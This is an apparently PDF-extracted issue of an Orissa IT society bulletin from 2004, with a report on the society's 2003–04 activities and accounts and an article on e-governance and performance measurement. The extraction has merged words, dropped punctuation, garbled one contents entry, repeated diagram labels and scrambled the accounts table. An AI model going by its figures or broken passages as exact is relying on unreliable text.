47
OITS Bulletin Journal of Orissa Information Technology Society No. 2, December 2004

oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

  • Upload
    others

  • View
    12

  • Download
    0

Embed Size (px)

Citation preview

Page 1: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS Bulletin

Journal ofOrissa Information Technology Society

No 2 December 2004

Chief EditorJyotiranjan SahuPresident OITS

EditorSK Pradhan

Secretary OITS

Executive EditorJyotiranjan Hota

OITS

Editorial BoardSP Misra

Sudarsan PadhyLaxman Mohanty

Chitta BaralHrushikesh MohantyArun Kumar Pujari

Jyotiranjan Hota

OITS Bulletin

PREFACE

In one of the meetings of Orissa Information Technology Society (OITS)the executive committee decided to bring out a bulletin OITS Bulletin to bereleased once a year preferably at the time of CITs We had invited popularand semi-technical articles from different authors and released the first Bulletinas an humble beginning during December 2003 It was further decided by thecommittee to publish the Bulletin during June and December of each year Wecould not publish the June issue of the Bulletin due to lack of sufficient articlesWe hope more participation from OITS members in future

Jyotiranjan Sahu Satish Pradhan Jyotiranjan HotaChief Editor Editor Executive Editor

CONTENTS

1 Activities of OITS 2003-2004 SP Misra 1

2 The Transition from Physical Governance Raj Kumar Prasad 9to e-Governance

3 Application of Data Fusion in Computer Sateesh Pradhan ampForensics Suneeta Satpathy 16

4 Interesting Patterns in CITs A Misra 21

5 Experiences amp Learning from Organisingan International Conference in aDeveloping Country Laxman Mohanty 25

6 Guiding Seminars and Projects forUndergraduate Engineering Students M N Das 29

7 Case study on ICT and e-Gov Krishnan V D G 32Quarterly Progress Report (April-June 2003)

8 Known Malware Exploitation Abhishek Bhuyan 37

9 LOtilde EcircOcircVethornethorn S_ecirc J aTHORNLETHh OgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH 41

Orissa Information Technology Society(OITS)

From April 2003 to March 2004

A Orissa Information Technology Olympiad(Held on 7th September 2003 )

Orissa Information Technology Society(OITS) conducted the annual quiz test at senior(MCA BE BSc(Eng) and BSc(hons)) and junior(upto class XII) levels with separate questionson 7th September 2003 The test to be held onthe last sunday of august or the first sunday ofseptember was originally scheduled to be on31st august but was shifted by a week as ganeshpuja was there on that day We contactedBerhampur Puri SambalpurBurla RourkelaSarang Cuttack Raygada Balasore DamanjodiParadeep Angul and Bhubaneswar About 1200students registered for the same and aroundeleven hundred students appeared This yearthere was a very positive response from RourkelaSambalpurBurla Raygada and Balasore andsome other places as additional venues ProfSudarshan Padhy Coordinator IT Olympiadmainly organised this activity and he was ablyassisted by many volunteers including MTech(Comp Sc) students (they were not eligible tocontest) and young faculty members The resultsat senior and junior levels are as below

The first three rank holders in the seniorlevel were

1 Puspita Ray IMCA 9th Semester (Utkal Un)

2 Parthasarathi Dash Un College of Eng BE(cs) 7th Semester (burla)

Activities of OITS 2003-2004

SP Misra

3 Geeta Mohanty MCA 2nd Semester (KIIT bbs)

The first three rank holders in the juniorlevel were

1 Bagdevi Panda Class XII DAV Public SchoolCDA Cuttack

2 Siladitya Mohapatra Class X St Paul SchoolRourkela

3 Amulya Ratna Dash Class X BlessedSacrament High School Puri

Names of the other rank holders may beseen in the appropriate website

B Orissa IT Olympiad Prize Distribution held on 18th january 2004

The IT olympiad prize distribution functionwas held on 18th January 2004 at 230 pm TheChief Guest was Bikramjit Maitra Head InfosysCentre at Bhubaneswar and the guest of honourwas Gautam Parija administrative head InfosysCentre Bhubaneswar Arun SamantarayAdministrator Utkal University presided overthe function All the prize winners along withtheir teachers were invited to the function Alsothe parents of the prize winners at junior levelwere separetely invited There were altogetherabout 70 to 80 participants

The president of oits S P Misra welcomedthe participants Next Sudarshan PadhyCoordinator IT olympiad program spoke aboutthe conduct of the olympiad examination andreferred to the fact that on this occasion therewere about nineteen centres in which thestudents appeared spread all over Orissa

OITS-2004

1

OITS-2004

2

Prizes were distributed by the Chief GuestBikramjit Maitra In the senior category the firstsecond and third rank examinees were givencash prizes of Rs3000- Rs2000- andRs1000- respectively and consolation prizesof Rs500- each for the remaining eightexaminees above along with certificates In thejunior category also the first second and thirdrank examinees were given cash prizes ofRs3000- Rs2000- and Rs1000-respectively and consolation prizes of Rs500- each for the remaining nine examinees alongwith certificates Most of the prize winners tookthese prizes and for those who were absent theamounts along with the certificates were sentby courier

The Chief Guest addressed the gatheringemphasizing the relevance of IT in all phases ofour Society He also mentioned that Infosys hasalways wanted to increase the number ofselected candidates from Orissa if they satisfyminimal norms needed for it He mentioned thatparallel to Olympiad tests the selection processin Infosys takes into account not only thebackground knowledge of the candidates butalso their ability to think and adapt themselvesto learn new techniques in computer scienceGautam Parija also emphasized that for selectionin Infosys the ability of candidates as such shallalways be as important as the knowledge theyhave already acquired

Arun K Samantarai Administrator UtkalUniversity also focussed on the role of IT inSociety He particularly emphasized the needfor closer collaboration with industry to makesuch programs a success While all lauded thisactivity of oits Sri Samantarai emphasized thatassistance could be sought from Industry forsuch programs

S P Misra emphasized on two aspects foran extension of the Olympiad activity (i) Hementioned that there is an attempt to coordinatethis activity with a similar activity at all Indialevel so that they can avail of internationalcompetetion and that (ii) from next year we mayhave a short training program of the beststudents appearing in the olympiad On behalfof Infosys Mr Maitra assured that help for thiscan be available from them

There was then a tea break after which likelast year an interactive session was conductedin the presence of Bikramjit Maitra and GautamParija Here students asked many questionswhich were mainly answered by the visitorsalong with open house discussions participatedby many experts and students

The meeting ended with a vote of thanksby Ajit Nayak treasurer oits as the secretarywas absent

C Opening of SAMBALPUR CHAPTER inaugurated on 29112003

In october 2003 about eleven oits membersfrom sambalpur area wanted that we may openthe sambalpur chapter of oits The president thenlocated the earlier members around sambalpurarea and also asked some members outsideorissa whether they would like to join thischapter The executive committee which met on16112003 then approved that we may open thischapter as per article 6 of the bylaws andconvenor for this chapter B Patel of G M Collegesambalpur was intimated accordingly

The chapter was formally inaugurated byProf M C Dash vice-chancellor sambalpuruniversity in a function at G M College premiseson 29112003 Prof Arun Pujari of hyderabaduniversity was the chief speaker He gave anilluminating semi-technical talk on artificial

OITS-2004

3

intelligence The Secretary Dr B Patel talkedabout the interesting programs that were thereduring cit2003 and also about the futureprograms of the sambalpur chapter PrincipalG M College was the guest of honour and S PMisra president oits presided over the functionProf Pujari had also given a technical talk beforethe inauguration meeting

The chapter began with a seed money ofRs10800+Rs8000 with the first being from theregistration fees of fourteen members and thesecond being a donation by S P Misra as he hada speial attachment to sambalpur as his fatherProf Narayan Misra was the first principal ofGM College which was the beginning of highereducation in that area The name of the accountof sambalpur chapter is oits-sbp

The Secretary has subsequently intimatedthat the following are the office bearers of thechapter

1 President Prof S K Sanyal PrincipalUCE Burla

2 Vice-President Prof C R TripathyUCE Burla

3 Secretary Dr B Patel G M CollegeSambalpur

4 Treasurer Dr A P Dash G M CollegeSambalpur

D WORKSHOP ON PARALLEL COMPUTING AND BIOINFORMATICS

Organised by sambalpur chapter

22nd and 23rd March 2004

Here 141 delegates had registered for theworkshop Out of them there were 10 lifemembers of OIT-sbp 13 faculties from nearbycolleges rest being students from differentbranches like MCA Engnieering Msc comp scPhysics Mathematics Botany and Life Sciences

Professor Sudarsan Padhy UtkalUniversity Vanivihar delivered talks on parallelcomputing in three different sessions

On 220304 in the first session heillustrated the same through different exampleslike weather forecasting image processing etcemphasizing the importance of ParallelAlogorithms over serial Algorithms and takingdifferent examples developed the problems onParallel Algorithm In the second Session somemore developements in the problems of parallelalogorithms with multiprogramming and multiprocessing systems were considered

The uniqueness in the workshop waspractical demonstrations as needed Ajit kumarNayak Silicon Institute of TechnologyBhubaneswar demonstrated in two differentsessions about clustering of different workstations through Linux with the syntax to writeprograms using MPI The programmes weredemonstrated to the students This approachcreates a lot of interest among the students forthe problems of parallel algorithms

There were Two Tea Breaks and One lunchbreak for all the delegates

On 230304 Professor Padhy developed theproblems of parallel algorithms and proved theresults

Ajit Kumar Nayak demonstrated moreprograms of parallel algorithms to the delegates

In the after noon session Prof Padhydelivered a talk on Bio-Informatics which wasfollowed by another talk from Prof APDashGMCollege There were two Tea Breaks and onelunch for all the delegates

A feed back Form were circulated to alldeligates and their views were collected whichwas enthusiastic and positive

OITS-2004

4

The main feature of this workshop was itsmultidisciplinary nature with the delegates alsobelonging to diverse disciplines

E Opening of ROURKELA CHAPTER

In late december 2003 a letter was receivedfrom Prof Sourya Patnaik director rourkelainstitute of management studies (rims) with alist of ten new members from rims along with arequest to open a chapter of oits at rourkela TheInstitute was rated as among the top 40 B-schools and had MCA programs along withbusiness school programs We already had quitea few oits members in nit rourkela and it wasthought that such chapter shall be serving theaims and objectives of oits for the spread of ITin orissa

S Patnaik and sreekumar both of rims actedas convenors of the chapter They furtherrequested that they already had a program forfaculty improvement scheduled for 8th January2004 and it would be nice to inaugurate therourkela chapter of oits then with the facultyimprovement program being the first functionunder its auspices However as per rules oitsexecutive committee needs to approve theopening of a chapter for which time was notavailable Since opening of this chapter wastotally parallel to the opening of the sambalpurchapter the president rang up some executivecommittee members and with their approvalintimated Prof Patnaik that we may do so

The chapter was inaugurated on 8thjanuary 2004 by again Prof M C Dash vice-chancellor sambalpur university The functionwas attended by the president oits whowelcomed the delegates by Prof S Padhy whospoke about IT and oits Prof G Panda whoelaborated on many aspects of IT to emphasizethat IT is so interdisciplinary that it could hardly

be regarded as an independent subject ProfSourya Patnaik presided over the function andintimated that they had requested Prof Panda ofNIT Rourkela to be the president of the chapterand he had kindly agreed

One thing about Prof Pandas talkparticularly impressed me He said that he cantrain computer students to be self-reliant andthrough software development through thistraining earn their own livelihood at acomfortable level I do hope that through hisleadership this will come to happen in whichcase rourkela chapter will lead oits and all ITlovers about a very positive action

The afternoon programe was devoted to theworkshop on financial computation where anexpert from finance introduced the subject andProf Padhy talked about the computationalmodelling of the corresponding theories It wasattended by more than twenty-five participantsspread from different colleges in orissa It is verywell known that economic models have becomehighly mathematical and with the need for wide-scale data bases computational finance isbecoming a very important area of IT

The executive committee of oits met on1212004 where it discusssed about the openingof the rourkela chapter and approved the same

Rourkela chapter started with the seedmoney of Rs11210+Rs8000 the first abovebeing the money transferred from oitsmembership fees and the second being adonation by S P Misra who was Professor at(then) REC Rourkela for ten years He alsothought that the amount should be reasonablesince as per rules at least half of the aboveamount shall be kept as fixed deposit By theway this fixed deposit gives some stability tothe chapters where generally the members shall

OITS-2004

5

try to make the programs self-sustaining Thename of the bank account of the chapter is OITS-Rourkela

Rourkela chapter at present has seventeenmembers The secretary as below has intimatedthat the following office bearers have takencharge

1 President G Panda NIT Rourkela

2 Secretary D P Acharya RIMS

3 Treasurer Barnali Pradhan RIMS

Let us wish rourkela chapter all success

F Opening of BERHAMPUR CHAPTER

Some oits members of BerhampurUniversity NIST and NIC belonging toberhampur met on 29th March and resolved thatthey wish to open the berhampur chapter of oitsThey also elected the following members as officebearers

President M R Patra (BU)Vice-President R K Dash (NIC)Secretary Indraneel Mukhopadhyay (NIST)Treasurer S K Padhi (BU)

I received the above communication fromthe secretary on 3032004 We discussed thematter in the executive committee on 3132004and decided that the opening of the berhampurchapter be approved and that the same may befollowed up by the new executive committee

G OITS BULLETIN

OITS has started bringing out a Bulletinwith semi-technical articles with the first issue(December 2003) being inaugurated duringcit2003 It was initially thought that it would anyearly bulletin but then in the last general bodyit was decided that it may come out during Juneand December of every year This can be viewed

downloaded from the website This along withmany very interesting articles contains an articleby S P Misra indicating the gradual evolution ofoits

H CIT 2003

The Conference organised by OrissaInformation Technology Society (OITS) andSilicon Institute of Technology de facto extendedfrom 21st December to 25th December 2003 On21st there was a Symposium on IT andEducation mainly organised by the SiliconInstitute where there were seven speakers fromdifferent parts of India This was conducted byNeharika Vohra from IIM ahmedabad

In the afternoon the same day there wasan inauguration function for the ConferenceHere N R Mohanty Chairman HAL Bangalorewas the Chief Guest Damodar Acharya Vice-Chancellor Biju Patnaik University ofTechnology was the guest of honour and VinayDeshpande chairman Encore Software Pvt LtdBangalore was the Chief Speaker P K Dashwelcomed all Sudeshna Sarkar spoke about theConference and S P Misra gave a vote of thanksAll the three guests gave wonderful inspiringtalks with a common theme being to have a senseof confidence by all of us that things arehappening will happen and in IT or in otherfields we need not be second to any othercountry

The main Conference was from 22ndDecember to 24th December in Swosti PlazaBhubaneswar During the Conference therewere three keynote talks (by (i) S K TripathyUCR USA (ii) Y Pratt UT Arlington USA (iii)Sajal Das UT Arlington USA) eight invited talksand three advanced tutorials Around 230delegates from 12 countries including Indiaregistered for the Conference and 122 presented

OITS-2004

6

their papers in the different technical sessionsThere was also an industry session with thetheme as India sustaining leadership positionin the global IT market

On 24th afternoon the valedictory functiontook place as the last function of the ConferenceS P Misra President OITS conducted the sameThe program chairs briefly recapitulated thesalient features of the Conference and then asin the last year the results of the two best paperawards were given (i) Amiya K Pujari IT awardof Rs5000- and a certificate for the best paperamong all the papers submitted and presentedin the Conference went to Joydeep Ghosh ofUniversity of Texas Austin USA for the paperentitled A probabilistic approach to privacy-sensitive distributed data mining done incollaboration with Srujana Merigu (ii) NarayanMisra IT award of Rs4000- and a certificatefor the best paper among all the papers submittedfrom Orissa and presented in the Conferencewent to D P Das Silicon Inst of Tech bbsr forthe paper entitled Electricity distribution datamining using soft computing and modifiedwavelet analysis done in collaboration with PK Dash

On 25th December in addition to the threeadvanced tutorials during the Conference sixtutorials were organised two of six hourduration and four of three hour duration atHotel Swosti Plaza All the tutorials wereapproximately with sixty participants each andwere well received

Some more information about theconference can be had from the websiteI Organisation of CITs

In the general body meeting of december23rd 2003 the following observations regardingorganisation of cits were made It was decided

that CIT could be held outside orissa if we findorganiserssponsors However the frequencyof hosting outside orissa can not exceed once inthree years

It was also noted that cit2004 had beendecided by the existing steering committee to beat hyderabad and was appreciated by membersas the exposure of oits members to the IT scenarioin hyderabad will be helpful to take up similaractivities in orissa

Consistent with the spirit of the earlierCITs it was recommended by the general bodythat (i) for academic participants in cit2004 theregistration fees from inside India for academicsbe Rs2000- (ii) oits members as such shall havea discount of 25 and (iii) oits members whodo not have institutional or project support shallhave a discount of 50 subject to their certifyingto that effect

Steering Committee of CITs It was alsofelt desirable that the constitution of the steeringcommittee practised since december 1999 needsto be modified It was thought desirable to havefour permanent members here and some rotatingmembers After some discussions it was thoughtthat the permanent members may be (two fromUSA and two from India)

1 Prasant Mohapatra2 R N Mohapatra (Steering Chair)3 G Panda (NIT rourkela)4 S P Misra

It was also decided that the rotatingmembers of the nth cit shall be the generalchair(s) the program chairs and the organisingchair of the (n-1)th cit along with the incumbentpresident of oits during the period of theconference

Thus the general body resolution ofdecember 1999 now stands replaced by the

OITS-2004

7

above There is an article in the bulletinregarding the progressive evolution of the CITsregarding organisation matters

As is the procedure now these members ofthe steering committee shall seek suggestionsoffers from different mebersinstitutions as theymay think appropriate The steering committeelist shall be intimated to all the oits members assoon as possible

J Executive Committee of OITS

The following are the office bearers in theexecutive committee from 1st april 2004 to 31stMarch 2006 as decided in the general body on23122003

1 President J R Sahu2 Vice-President S Padhy3 Secretary S K Pradhan4 Secretary (overseas) P Mohapatra5 Joint Secretary S K Udgata (Berhampur)6 Joint Secretary B K Patel (Sambalpur)7 Treasurer A K Nayak

In addition the following additionalmembers were also elected to the executivecommittee

S P MisraB Misra (bsnl)A K Panda (ceo elmark)P K Behera (csa uu)S TorasiaS K MohantyA K Das (etdc)Chitta Baral (asu)J R Hota (KIIT Deemed University)

The executive committee as above willoperate from 1st april 2004 till 31st March 2006

K OITS Accounts

There were 48 new life members one donormember one institutional member and one morelife member who registered with the sambalpurchapter The total membership of OITS nowstands at abput 220 NIST conducting cit2001had not returned an advance of Rs20000-given to them they have now returned the samealong with an additional Rs2000- The balancefrom cit2002 amounting to about Rs195000- was a good addition to corpus of funds of oitsof which about Rs2000- was spent for auditingthe accounts of the same We particularlyappreciate the generous assistance of OrissaSociety of Americas of an amoount of aboutRs48600- to oits through personalcontributions Income from IT olympiad roughlybalanced the expenditure in conducting thesame however from OITS funds we have paidabout Rs20000- as prize money which wehope will focus on IT activities for the studentsAlso OITS transferred a sum of about Rs22000- from our corpus of funds to the corpus of fundsof sambalpur and rourkela chapters for openingof the two chapters and we hope the newexecutive committee will do the same forberhampur chapter

The balance with oits at present isRs68888862 of which about Rs636400- iskept in fixed deposits This account along withthe earlier accounts may be seen in appropriateoits website

About the author He is basically a physicist Fiveresearchers working with him have won the prestigiousAlexander von Humboldt fellowship His bookIntroduction to Supersymmetry and Supergravitywas a best seller for more than five years in amazoncomand has been recommended by Prof Witten of Instituteof Advanced Studies Princeton to his researchersNow engaged in organization of OITS

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

Mandatory organisational andinstitutional changes affecting both peopleand methods at all interfaces of the DeliveryChain

The need for acceptance of ChangedProcesses to be properly understoodinternalised adopted and improved toenable full advantages of the technologybeing adopted

De-layering of the decision-making levelsleading to re-engineering and appropriatesizing of the decision-making machinery

Training and acclimatisation of personnelat all levels more so at the lower rung ofgovernment management organisations

Prime MinisterChief MinisterLocalRepresentative Political Will PowerLoss of vested interests and assumed

power as well as authority both amongst thelegislature and the executive

We tried to conceptualise this with adiagram In the democratic world citizens electa person who is later termed the peoplesrepresentative or an MLA or MP All previousresearch did not include the peoplesrepresentative because in a democratic set-up

OITS-2004

12

the peoples representatives rule the countrythrough the Legislative Assembly or Lok Sabha(Parliament) and through the making of peopleor business-friendly laws and citizen-relatedschemes For the first time we tried to link thesepeople because political motivation is imperativefor the e-governance drive in India or anywhereelse in the world All people are directlyconnected with their representative as well as

administration for day-to-day governmentservices or work In this diagram both thepolitical level and administrative level are linkedwith citizens

In the abovementioned concept keeping inmind the reality of a democratic country andPerformance Management and Change Managementwe tried to bring in a new definition for e-Government

Performance Measurement of Government workforce

Change Management

Prime MinisterChief MinisterLocal Representative

Political Will Power

Efficiency in Government

Citizens Confidence in Government for

Better

Better Citizens Services through ICT-e-Government

e-Governance

Administrator

People willChange The Representativeif they do not perform

Citizens Confidence inGovernment for Better

Governance

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

